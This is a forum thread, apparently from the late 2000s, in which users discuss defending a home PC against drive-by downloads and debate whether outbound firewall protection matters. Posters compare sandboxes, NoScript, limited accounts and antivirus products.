Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

My reasoning/situation.

I have gotten malware/virus on my computer once in past 8 years, my wife ~5 times. All were via internet infested pages. (My wifes AV has probably blocked a hundred over 8 years)

Not concerned with inbound since using router, and my software firewall past 8 years always says "0 access attempts".

My wife is european, works on websights, and has to use internet explorer most of the time. Some of European forums/sites occasionally have issues with malware. Turning off scripts makes her work difficult (she refuses to). She has gotten her bios and registry hosed a couple times from zero day exploits which AV missed. That is a minor irritation. The real concern is she got malware one time which an outbound picked up trying to phone home. While outbound is necessary on her computer, prevention is obviously better.

Greenborder was a godsend sandbox for a few days, until we realized it continously corrupted IE links, which made it unusable. Sandboxie is not bad, but there are some issues with her work, and it slows down browser by a second or two, and she thus wont use it.

From our point of view, 100% of risk is via browsing. Our only real security threat is driveby downloads, more for wife than me. Especially to those who dont think outbound is important, (ie those that are confident they can keep malware off their computer), how do you stop driveby downloads? Is there something I am missing?

Do you just turn off scripting and suffer with the irritation or?

My wife did try using firefox with noscript (even though not convient for her work), but she got malware using that, ? it was a site she whitelisted, which later had malware vs other). So back to IE as more convenient for her.

Any other ideas on safe web browsing that I am missing? Greenborder has right idea, it was just poor implentation, not to mention they are no longer in business.

-{ Quote: "Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?" }-
I just use NoScript.
-{ Quote: "2) For those not concerned with outbound, why?" }-
So far my AV has caught any malware before it installs. The chance of getting a rootkit or other malware installed and connecting out seems so negligible that I just dont worry about it.

Im not concerned with legitimate software connecting out either.

-{ Quote: "
1) How are you preventing drive by downloads?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

" }-

Prevention is always better than cure , that is for sure . About drive-by downloads -> Unlikely most of my relatives/friends I know what cyber threat is and how it acts , I don't click on each and every link I manage to see , I keep my computer and everything inside "mean and lean" (a.k.a don't install each and every program) . Once malware has infested a machine , it is not difficult to find it and it is not impossible to remove it .


Since I know what is already on the machine , I am supposed to know how and where it connects to , so I trust their connection(s) - this is why I don't need outbound firewall protection


-{ Quote: "From our point of view, 100% of risk is via browsing. Our only real security threat is driveby downloads, more for wife than me. Especially to those who dont think outbound is important, (ie those that are confident they can keep malware off their computer), how do you stop driveby downloads? Is there something I am missing" }-

Think 3 times before you click a link . Choose a antivirus that works (mine has never left me in critical moments) . In addition , make your wife's computer has the Microsoft-MVP's host file (http://www.mvps.org/winhelp2002/hosts.htm) (updated monthly) so that your computer "rejects" known bad sites

-{ Quote: "1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?" }-
Yeah, that is quite all, what I used in XP with a firewall and what I use now along with Vista's engine covered by UAC and IE7 with protected mode.
Disabling scripts provide almost full protection, if you keep your OS and all other apps regulary updated, properly set up and avoiding unknown things.
-{ Quote: "2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses)." }-
I am not consered about privacy, like some software trying to find out, what PC I have or what webpages I visit, as long as it does not slow down PC.
As HiTech_boy pointed out, the prevention is the key and once the malware is in, it is too late anyway and the best way to get rid of it, is a clean instal.
I hope, that I am quite well protected, because even if I would use a dozen of security apps, I could still only hope, that they would catch all those nasties.
So far I have not noticed any malware in my PC, so I guess, that it works (for years), but who knows, maybe I have a bot PC and I even do not know about it.
-{ Quote: "Do you just turn off scripting and suffer with the irritation or?" }-
Well, it has some disadvantages like a few disabled webpages and some with limited functionality, but its advantages, like speeding up loading webpages, no google ADs or popups and 99% malware free PC, overtake it. Anyway, if I want to allow something, I add a webpage to trusted pages and it mostly works, not sure about Firefox, but in IE it is possible to setup, which scripts to run along with other settings. I tested it 4 times with zero day exploits and even when I had POC webpages in trusted zone, I was protected against 2 of them, until I tried default Internet zone settings, the other 2 could be prevented by hardware DEP.

-{ Quote: "Greenborder was a godsend sandbox for a few days, until we realized it continously corrupted IE links, which made it unusable. Sandboxie is not bad, but there are some issues with her work, and it slows down browser by a second or two, and she thus wont use it." }-
Try GeSWall (http://www.gentlesecurity.com/). Very light, policy-based sandbox. The free version protects browsers.
-{ Quote: "My wife did try using firefox with noscript (even though not convient for her work), but she got malware using that, ? it was a site she whitelisted, which later had malware vs other). So back to IE as more convenient for her." }-
Use temporal whitelist and set NoScript to control plug-ins (Quicktime, Flash). Also keep Firefox up-to-date.
-{ Quote: "Any other ideas on safe web browsing that I am missing?" }-
Good old common sense, Link Scanner Lite (http://www.explabs.com/products/lslite.asp), etc.

Security is unfortunately almost always a trade-off between convenience and strength.

-{ Quote: "1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?" }-

As you say, if a white listed page gets infected I am not sure noscript can help. But then I have a second layer of protection: Limited User account. On op of that I have a decent antivirus and application filtering firewall. If that would ever fail me I would use sandboxing software and unintrusive AT like Boclean or even likewise unintrusive HIPS like Prevx2, Norton Antibot. But so far HIPS in a LUA seems a bit overkill.

-{ Quote: "Any other ideas on safe web browsing that I am missing? Greenborder has right idea, it was just poor implentation, not to mention they are no longer in business." }-

Why not run under a restricted account? It is not that much hassle one would think. I have until recently avoided LUA coz I thought it would hamper my computing, but then I thought if a Linux junkie can live with it, so can I :D

Or you could try surf inside Bufferzone (downside - doesnt work with BHO´s like Roboform), Defensewall, Sandboxie, Safespace, all software that isolates the browser from the rest of the system. Runsafe is another, it lowers the privileges of the browser. So it is not that hard to protect yourself. Personally I haven't seen any malware in years, even when visiting the darker side of the net.

-{ Quote: "Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

" }-

On our home PC's we use the combo of a policy sandbox and behavior blocker.

The policy Sandbox HIPS should protect from most threats, without sacrifying functionality. For downlaoded programs our AV misses, I trust the IDS/Behavioral blocker to protect me until the AV knows that malware (when it does something strange the behavior blocker will get it, when it lays low the Av will ultimately know its signs/fingerprint).

DefenseWall or GeSWall (32 bits), HauteSecure (vista64), A2 Malware with IDS or ThreatFire free (32 bits) and Primary Response Safe Connect (Vista64).

You could also run your browser as a limited user account (Amust Defender in XP, Vista has it's UAC).



Regards

Thanks for the suggestions.

I realize surfing on US/English sites the risk of having financial info stolen via a trojan is neglible, and if it was not for my wife, I would smirk at that possibility as well. But on Russian/Ukranian sites the new trend is malware that looks for credit card numbers, account numbers etc.

In the US it would be highly unlikely that say a moderator at Wilders would post a legitimate link that also silently installs malware, on some Russian sites, not so unlikely. My wife can not simply avoid any of the sites, and no way to tell which rare ones are going to have malware.

Have not tried GesWall or the Microsoft-MVP's host file, will look into those, thanks. Though I dont know if MVP will have all the russian sites.

We both surf with dropmyrights limited user account, but just started that in past couple months, so will see how that helps.

For her a sandbox would be ideal, as she is basically surfing in a minefield. I will try Geswall and some of the others listed that I have not tried yet, if I can find something that wont slow her down, and allows her to do her work that would be great.

Thanks again for the suggestions!

If you run Vista with UAC enabled, you are going to get a UAC prompt if a site does anything funny. Don't put too much trust in the IE7 sandbox in Vista. You could give permission to and active-x control that was a keyloger. It might only work in IE7, but that is enough to steal your banking logon.

I used noscript for a while, but found it to be too much work. Even if I am capable of making decisions to train security software, my standard of performance is could an IT department roll this out to 1000 workstations where 975 of them are run by folks who don't know anything about computers and it all would work without a jillion calls to the help desk. I really do not need to be bothered by the security software unless something is really amiss. Unfortunately the stuff is so dumb it never gets trained.

There are some highly regarded firewalls and HIPS out there that are actually useless to anyone but an expert user because they never are done asking questions.

With good AVs with proper protection, one only needs to apply some common sense and outbound protection is no longer needed, a router takes care of inbound quite well.

-{ Quote: "Thanks for the suggestions.

For her a sandbox would be ideal, as she is basically surfing in a minefield. I will try Geswall and some of the others listed that I have not tried yet, if I can find something that wont slow her down, and allows her to do her work that would be great.

Thanks again for the suggestions!" }-

When you are willing to pay, DefenseWall is the easiest to use. GesWall free might require some configuration to allow printing from the web.

DefenseWall versus GeSWall = very easy versus easy
GeSWall Pro versus DefenseWall = in GeSWall you can set certain untrusted aps (like mail = Yess, others like P2P and Webbrowser not) to access confidential files (for mail obbiously your mailbox directory, but you can deny access to other confidential directories). Defensewall does not allow untrusted aps to access confidential directories. It is yes or no. Same applies for trusted level DefenseWall only has trusted and untrusted, GesWall has 4 options. Besides the configurability of untrusted aps per confidential folder, I have not encountered any other advantage GeSWall has over DefenseWall. The advantage DefenseWall has over GeSWall is it out of the box no easy setup. They both do well in protection (both are from russian origin, so it takes a hacker to protect you from hackers).

DefenseWall is absolutely the only Sandbox HIPS which works right out of the box and is a very quiet HIPS I know. GeSWall is also quiet, but has more options and some times (dependinbg your set up) requires some configuration. That is why my son preferres GeSWall and my wife DefenseWall.

Regards

-{ Quote: "With good AVs with proper protection, one only needs to apply some common sense and outbound protection is no longer needed, a router takes care of inbound quite well." }-
Very true Arup, and also, relying on outbound implies that the threat has already installed itself and run on your machine, which is not a good situation either, better to keep the nasty off the PC to begin with.

I agree with the above. I´ve never been concerned about the outbound protection since prevention is the most important thing. However, I would like to see some tests/reviews about how good different firewalls are concerning the inbound protection. Does anyone know were to find these tests?

/C.

Any site can be compromised. If you find out about it you may be able to use a software firewall to block movement to the (potentially redirected) site that installs the malware:

http://www.wilderssecurity.com/showthread.php?t=136452&highlight=gromozon

Naturally you can also block the usual Microsoft stuff, like when you use the Search, Help, Files and Settings Transfer Wizard, etc. or even block certain sites altogether.

As far as trusting apps go, you never know when a corporation changes its philosopy or lets bugs creep into their software. Examples like Zonealarm connecting to Zonelabs servers without permission (due to a so-called "bug") and some versions of Flashget being silent while the next version they come out with wants to talk to the whole world. What you trust one day may be the enemy tomorrow, especially if you allow automatic updates or try out new software versions a lot or don't keep abreast of unpatched vulnerabilities.

Outbound software firewalls provide some protection for the above.

Kerodo and Arup, the reason I phrased the question like that, I was hoping those that were not concerned with outbound protection would share what security steps they take that allow them to not be concerned with outbound. Common sense and antiviral programs, be it NOD32, KAV, NAV are excellent suggestions, unfortunately they are insufficent for surfing Russian web sites, though granted that method works in English/US sites. You could argue that common sense dictates not surfing on said Russian web sites, but my wifes job entails doing so. She may be on the same page a hundred times over several months without problem, and then 101st time it has malware. I used to get irritated at her each time, then I learned what she was up against.

However, I agree 100% that keeping it off is the way to go, and trying to get some additional tips for doing so. So far I think a sandbox that does not slow performance would be best bet.

Kees1958, thanks for suggestion, I will look at Defensewall, hopefully they have a trial version so I can see how it performs. Cost is not an issue, I happily paid for greenborder and used it until realizing it was continuously corrupting IE links/shortcuts, ie kept wiping out the web document tab and thus URL of the shortcuts. The only issue is will it slow surfing down or computer. My wife has 50-100 pages open at a time, and goes pretty quickly, some sites she visits, some helps to maintain, some she is a client on etc. She will use sandboxie some, but even the slight 1-2 second slowing of surfing over long run will irritate her to point she quits using it.

I must admint that I dont surf to russian websites that often. It happens, but I guess it is not the malware sites you wife uses. I would love to test my defenses on malware sites (but they are hard to find imo)
Could you pm me a couple of the sites your wife gets the malware from and I will test the stuff I have to see if I am vulnerable. If I am, I can set up something quickly that will protect me and give you suggestions..

You dont have to worry about spreading malware, I do have layered defense and always have a 1 to 6 hour old images of my system to restore to if something should get out of hand so I think I can handle any risks. I always image back to a good image after I try malware even if my defenses seem to take care of the attack.

-{ Quote: "
1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses)." }-

I use Firefox or Opera as my primary browser. I only visit a small handful of websites each day...pretty much just the same dozen forums..tech forums, well known tech forums, sum to up 99% of my browsing. Pretty much the only time I use Internet Exploader is when I hitup my Exchange Server at my office via Outlook Web Access, or use Remote Web Workplace to connect to my Small Business Server clients. No e-mail clients..use Firefox when I check my GMail.

Am I sure that I'm immune? No, there's never a guarantee. But I'm careful of what I do, this isn't my first day using a computer. And I'm probably likely to notice odd behavior that my be a symptom of something hitting me.

Software firewall are no guarantee either...they can have vulnerabilities which can knock them out (stop the service from running).

And..lets face it...I'd wager that at least 95% of software firewall users don't know what the heck most of any warnings are about. svchost or explorer is connecting to the internet..."Oh...OK..go ahead".../clicks OK.

-{ Quote: "I must admint that I dont surf to russian websites that often. It happens, but I guess it is not the malware sites you wife uses. I would love to test my defenses on malware sites (but they are hard to find imo)
Could you pm me a couple of the sites your wife gets the malware from and I will test the stuff I have to see if I am vulnerable. If I am, I can set up something quickly that will protect me and give you suggestions..

You dont have to worry about spreading malware, I do have layered defense and always have a 1 to 6 hour old images of my system to restore to if something should get out of hand so I think I can handle any risks. I always image back to a good image after I try malware even if my defenses seem to take care of the attack." }-

Reading my first post, my wife got malware 5 times in 8 years. Surfing ~1000 pages a day, ~300,000 per year, or maybe 1 infection per half million pages. And you want me to send you links so you can surf in the same manner for 3 months til you run into malware?

If there was one site that consistently had malware, no one would go there, it would be out of business. My wife is not surfing pron, where you can find the same malware on the same page infinitum.

The whole point, in Russia, rarely legitimate sites get problem with malware, and recently malware targeted towards stealing. It is quickly cleaned off when discovered, but not until some damage is done. Does not really happen much in US, but monster.com did have some fake adds recently that downloaded trojans that captured personal information and sent it to servers, was in news month or two ago.

If you are really looking for malware, I am sure plenty of people could tell you where to find it even in the US.

-{ Quote: "I must admint that I dont surf to russian websites that often." }-
Most of the sites that spreads malware are not in the .ru zone- most of it are .biz, .info and .com.

Hello,

Without quoting you too much ...

1. Drivebys only work in IE, never in Firefox or Opera, so use those.

2. As to getting infected using Firefox with Noscript - it's not difficult. You reach a site, you download a file, you execute it - you are infected. As to getting infected by simply visiting a page - with the above setup - no chance.

3. Outbound - don't get infected and your outbound is a perk ... simple as that.

Mrk

-{ Quote: "1. Drivebys only work in IE, never in Firefox or Opera, so use those." }-
Drive-by-download malware spreads with all the browsers you just mentioned. Just look for a interview with MPack developer- he recommended Opera with JavaScript disabled. :D

Hello,
Recommendations are one thing. Theory is another.
Reality is something else.
Mrk

-{ Quote: "Hello,
Recommendations are one thing. Theory is another.
Reality is something else.
Mrk" }-and mis-information spread is the worst of all evils.

Hello,

I have posted in good faith, fully believing what I wrote and without any intention to deceive or mislead anyone.

The way I see things - and here's an analogy - a person could get killed by a meteor or he might tunnel through a wall - nothing in the physical laws prevents this from happening. It's just the chances are so small, we can round them to zero.

The same applies here. Of course, the utterly careless combination of downloading and executing files without regarding in search after cracks and such, plus the use of outdated software (not a week or two but months), might possibly result in some sort of remote execution exploit. But I think this is a remote chance by far.

Cheers,
Mrk

-{ Quote: "Hello,

I have posted in good faith, fully believing what I wrote and without any intention to deceive or mislead anyone.

The way I see things - and here's an analogy - a person could get killed by a meteor or he might tunnel through a wall - nothing in the physical laws prevents this from happening. It's just the chances are so small, we can round them to zero.

The same applies here. Of course, the utterly careless combination of downloading and executing files without regarding in search after cracks and such, plus the use of outdated software (not a week or two but months), might possibly result in some sort of remote execution exploit. But I think this is a remote chance by far.

Cheers,
Mrk" }-

Well, my wife has gotten hit 5 times in 8 years, not common, but too common for me.

Once was using firefox with noscript. She whitelisted quite a few sites, it is simply impractical otherwise, unless you want to hit ok 10 times each time you land on a site. And she has to allow script on some sites. And likely, and unfortunately one site she whitelisted later had a malicious script.

Bottom line she has entirely different use than you, entirely different set of needs, entirely different sites, entirely different risk than you. So unfortunately your way does not work for everyone's needs. Works for me and you, but not for her.

But I guess if you dont see it in your habits, it does not exist.

IMO, and reading your concerns and replies, look into GeSWall and DefenseWall as recommended, and choose one.
Then perhaps LinkScanner Pro (given the requirements from your wife's browsing) already suggested too.
Anti-virus, the paid ones that are regarded as the best - Avira Antivir, NOD32 or Kaspersky.

That's just software recommendations though. DEP configured in AlwaysOn, if it doesn't break anything important, is a good start. This thread (http://www.wilderssecurity.com/showthread.php?t=175384&page=2&highlight=alwayson) was where i learned about it, from Ilya. Read from that page onwards and you'll see what's at stake.

Then the limited user account. If something doesn't work in lua, try reading here (http://www.wilderssecurity.com/showthread.php?t=181375&highlight=sudo).

Another solution might be "shadow" softwares (Deep Freeze, Shadow Defender, Returnil, Power Shadow). They clean everything on reboot. Of course, they don't prevent data stealing between reboots and you need to save any document/file stored in the system partition before rebooting.

-{ Quote: "relying on outbound implies that the threat has already installed itself and run on your machine...." }-
Not necessarily. Using a software firewall to block/alert to new or unexpected outbound connections is acknowleging the possibility that your primary defenses aren't foolproof, especially the user. No anti-whatever catches everything. No users judgement is perfect. Common sense doesn't always get it done, not when trusted sites can be compromised. The software firewall is another layer of defense that just might keep your data out of the wrong hands should your primary defenses (or the user) fail.
-{ Quote: "Recommendations are one thing. Theory is another.
Reality is something else." }-
Todays theories and POCs are tomorrows exploits. The alternate browsers may have fewer vulnerabilities which get fixed much quicker, but the fact that they do get patched or updated demonstrates that they can be exploited. Firefox and Opera may be safer to use than IE, but no browser is invulnerable.
Rick

Personally I prefer the type of outbound firewall that has a large whitelist of applications and only asks the questions that are needed. When HIPs come into the situation (Comodo beta) I usually just turn it off. Too much noise really.

So yes I think a software firewall with outbound is necessary if your defenses are taking a nap. However I agree with the notion it cant hog system resources and it cant bug you to death.

I've always been under the impression that firewall developers drive themselves crazy balancing security with convenience. :P

-{ Quote: "
2) For those not concerned with outbound, why? " }-

As more & more leak tests were developed they showed that outbound
control by a firewall was, at best, well, leaky. From my point of
view, it's wiser to seek another defense than rely on a gun that is
half loaded with blanks. I think HIPS, IDS, whitelists, rollback
software, etc., are a better way to go. Needless to say, I gave up on
bi-directional firewalls in favor of in-bound only filtering. Better the devil
you know....

Well, I have been surfing the net for about 12 years now, going to good and bad places alike, using Firefox, Opera, K-Meleon in recent times, along with IE7 and prior versions, and I have never ever once been hit by a drive-by download, so I must just be lucky....;)

-{ Quote: "Well, I have been surfing the net for about 12 years now, going to good and bad places alike, using Firefox, Opera, K-Meleon in recent times, along with IE7 and prior versions, and I have never ever once been hit by a drive-by download, so I must just be lucky....;)" }-

Ah - but perhaps you are a part of a botnet, and you're only not aware of it ...;)

Seriously: What you said is also true for me. The only difference is that I've been using Firefox exclusively for many years. (in the ole' days when I still used IE browsing wasn't as dangerous yet.)

Just my two cents: I agree with Mrk that browsing with Firefox is very safe and even safer with Noscript (although it's true that whitelisted sites can also be compromised) - all things considered, the probability of becoming infected is very small when using this browser. I also agree with sukarof that a limited account enhances security considerably. And I also use a HIPS but actually I don't need it.

As for outbound control: My opinion about this topic can read in this (http://www.wilderssecurity.com/showpost.php?p=1077924&postcount=22) posting.

-{ Quote: "Ah - but perhaps you are a part of a botnet, and you're only not aware of it ...;)

" }-
Yes, and perhaps this is the planet Zaphrod that I'm living on too... ;)

-{ Quote: "Main two questions is

1) How are you preventing drive by downloads? Just turn scripting off and suffer the hassles? or? And does turning scripts off give full protection?

2) For those not concerned with outbound, why? (Are you that sure you are immune from drivebys, primarily zero day that AV misses).

My reasoning/situation.

I have gotten malware/virus on my computer once in past 8 years, my wife ~5 times. All were via internet infested pages. (My wifes AV has probably blocked a hundred over 8 years)

Not concerned with inbound since using router, and my software firewall past 8 years always says "0 access attempts".

My wife is european, works on websights, and has to use internet explorer most of the time. Some of European forums/sites occasionally have issues with malware. Turning off scripts makes her work difficult (she refuses to). She has gotten her bios and registry hosed a couple times from zero day exploits which AV missed. That is a minor irritation. The real concern is she got malware one time which an outbound picked up trying to phone home. While outbound is necessary on her computer, prevention is obviously better.

Greenborder was a godsend sandbox for a few days, until we realized it continously corrupted IE links, which made it unusable. Sandboxie is not bad, but there are some issues with her work, and it slows down browser by a second or two, and she thus wont use it.

From our point of view, 100% of risk is via browsing. Our only real security threat is driveby downloads, more for wife than me. Especially to those who dont think outbound is important, (ie those that are confident they can keep malware off their computer), how do you stop driveby downloads? Is there something I am missing?

Do you just turn off scripting and suffer with the irritation or?

My wife did try using firefox with noscript (even though not convient for her work), but she got malware using that, ? it was a site she whitelisted, which later had malware vs other). So back to IE as more convenient for her.

Any other ideas on safe web browsing that I am missing? Greenborder has right idea, it was just poor implentation, not to mention they are no longer in business." }-

The best protection on the market for drive-by downloads is Browser Defender in NIS2008. Here is why: NIS2008 is able to see through any kind of encryption of obfuscation used by drive-by downloads. Kaspersky and some others can only see what ever a document.write sees since thats what they hook. So they miss a lot of stuff. Some numbers on some other newsgroups indicate that KIS missed 1217 out of 13000 websites tested. Thats a lot. An I believe it cause I have seen it miss a few and the system gets infected.

One misconception is that if Windows Update runs and Windows is patched then you are protected. That is far from the truth. The reality is that the newer vulnerabilities are in 3rd ActiveX like Yahoo WebCam, Yahoo Widgets, Winzip, NCTAudio, Baidu Soba Search bar, WebThunder etc. These take time to patch and during that time you are exposed.

So here is what I would recommend:
- Keep your system fully patched INCLUDING 3rd party software
- Run a sophisticated Browser Exploit detection software like NIS2008 (07 and below dont have this)
- Run a sandboxing tool like Haute Secure (just as a safety measure).
- Finally, always terminate ALL instances of the browser and then launch a fresh one before doing ANY online financial transaction where a lot is at stake. The reason for this is simple. All these sandboxing software have many fundamental flaws: the most important of which is that the exploit occurs and malicious code is running int he browser process (it can't get out). But if you use that same process to visit bank of america, you could get creds stolen.

Btw.. if you find a URL that NIS2008 does not block, let me know.

Hope that helps.

This is an interesting discussion. I looked up a few of the HIPS products mentioned above. Their descriptions seem to be a lot like running in a limited user account.

You might want to try this resource for using an LUA:

http://nonadmin.editme.com/

His "easy" method is to use an administrative account with a blank password and fast user switching. One of the benefits of the LUA is things are blocked and there is no prompt to react to thus eliminating the possibility of making a bad choice. It is not possible install an active x control in IE while running LUA.

I am of the persuasion that outbound protection is overblown. Its popularity comes from the fact that it is easy to run these tests and rank firewalls accordingly.

There seems to be a general lack of evidence that outbound filtering is catching malware. Perhaps this is because the malware uses techniques to make outbound communication that are different from the leak tests such as disabling the firewall or bypassing it with a communications driver.

Although the OP has experienced an infection with Firefox, I none the less believe it is more secure than IE because it lacks active x, is not integrated into the operating system, and it is patched more frequently than IE. The point raised above about 3rd party browser add ons being a potential source of attacks is well taken. Any such software should be removed if it is not essential.

-{ Quote: "Well, I have been surfing the net for about 12 years now, going to good and bad places alike, using Firefox, Opera, K-Meleon in recent times, along with IE7 and prior versions, and I have never ever once been hit by a drive-by download, so I must just be lucky....;)" }-

Unfortunately, Kerodo, I have been hit a few times. And I go to mostly the 'good' sites.
I prefer to be able to block unwanted inbound but I also recognize the need for strong outbound protection.

-{ Quote: "Well, my wife has gotten hit 5 times in 8 years, not common, but too common for me.

Once was using firefox with noscript. She whitelisted quite a few sites, it is simply impractical otherwise, unless you want to hit ok 10 times each time you land on a site. And she has to allow script on some sites. And likely, and unfortunately one site she whitelisted later had a malicious script.

Bottom line she has entirely different use than you, entirely different set of needs, entirely different sites, entirely different risk than you. So unfortunately your way does not work for everyone's needs. Works for me and you, but not for her.

But I guess if you dont see it in your habits, it does not exist." }-
Hi spamyou,

I just want to ask something: assuming the latest version of Firefox was installed, has your wife ever been infected through Firefox when NOT using NoScript?

The reason many people (myself included) are not worried about outbound protection is because we know there is nothing inside our PCs that connect out maliciously, and that knowledge stems from the fact that we have the biggest vector malware can attack from, aka the internet browser, locked down. The easiest way to do this is to simply use a non-IE browser, or a sandboxing program. If you have some time to spend and are interested in learning further, there are programs that can monitor your internet browser for any suspicious activity, such as when it comes under a buffer overflow attack or when it tries to silently execute a new program without asking you.

All in all, driveby downloads are a smaller problem than you'd expect, especially when you learn why and how they can happen - the solutions and countermeasures become very obvious then.

@ Zombini,
I just looked at the NIS 2008 site.
If I am understanding this correctly Browser Defender only protects IE7. This would leave FF, Opera and others out of luck. And I prefer FF and Opera to IE7.
Am I understanding this correctly?
Thanks.

Spamyou,

GeSWall Pro or DefenseWall (as said earlier) might do the trick. I changed from IE7 to Opera on the PC of my wife. You can skin Opera in such a way you won't notice the difference. Other plus of Opera it loads way faster then IE or FireFox.

Regards Kees

-{ Quote: "@ Zombini,
I just looked at the NIS 2008 site.
If I am understanding this correctly Browser Defender only protects IE7. This would leave FF, Opera and others out of luck. And I prefer FF and Opera to IE7.
Am I understanding this correctly?
Thanks." }-
I'd say that's because only IE7 needs this "Browser Defender" protection - an UNPATCHED copy of IE7, that is. Apparently when all patches are applied, IE7 is quite the secure browser, despite popular belief.

-{ Quote: "@ Zombini,
I just looked at the NIS 2008 site.
If I am understanding this correctly Browser Defender only protects IE7. This would leave FF, Opera and others out of luck. And I prefer FF and Opera to IE7.
Am I understanding this correctly?
Thanks." }-


It only protects IE, both IE6 and IE7. Yes, there is no support for FF and Opera.

Thanks for all the suggestions.

I had what I thought was the ideal setup for her.
IE7 via LUA (dropmyrights) with sandboxie for browsing. Sandboxie was set to erase all, no saving, on closure.

She would close IE7 (erasing sandbox) and use firefox when visiting financial sites (she prefers IE7 for work and browsing, though will use firefox for just financial, and it helps her to mentally remember to close IE7).

I think this would have been very safe, but sandboxie slightly 10-15% on average slows browsing, and on sites with lot of content can hang for a second, and I get constant complaining.

So substituted Geswall which does not slow browsing at all. Only issue I have, I use sandboxie myself, I dont understand Geswall as well, and I dont believe it deletes all files auto on closure, and instead tries to specifically trap malware based on behavoir.

I actually like Defencewall's security best, but it too slowed browsing some, and even little more than sandboxie.

I tried forcefield, new beta browser sandbox from Zonealarm, but it corrupts links like old greenborder did, they are still working on it.

I have not tried opera, and if it has a skin similar to IE7, will look into that. Haute Secure I have not heard of, will try that as well. I have an allergy to symantec products from fixing several friends computers.

So basically still looking for ideal sandbox (for her) that virtualizes and erases all automatically when closed, and does not slow browser down at all. But for now using Geswall for her, and who knows maybe that is just as safe as sandboxie, I need to read more about it.

I suggest you try the anti-malware software forum if the discussion is going to veer towards the specifics of sandbox applications, and the like.

Depends what the original poster meant by "outbound". If all you want to do is see who is doing all those 'dial-outs' especially when one boots up there is a simple thingie that 'snitches' & prompts you: "so & so" program is trying to 'dial out'. Do you give Permission: YES - NO?

I don't remember the name of this little freebie firewall but the answer was posted up in this forum last year but I can't find it.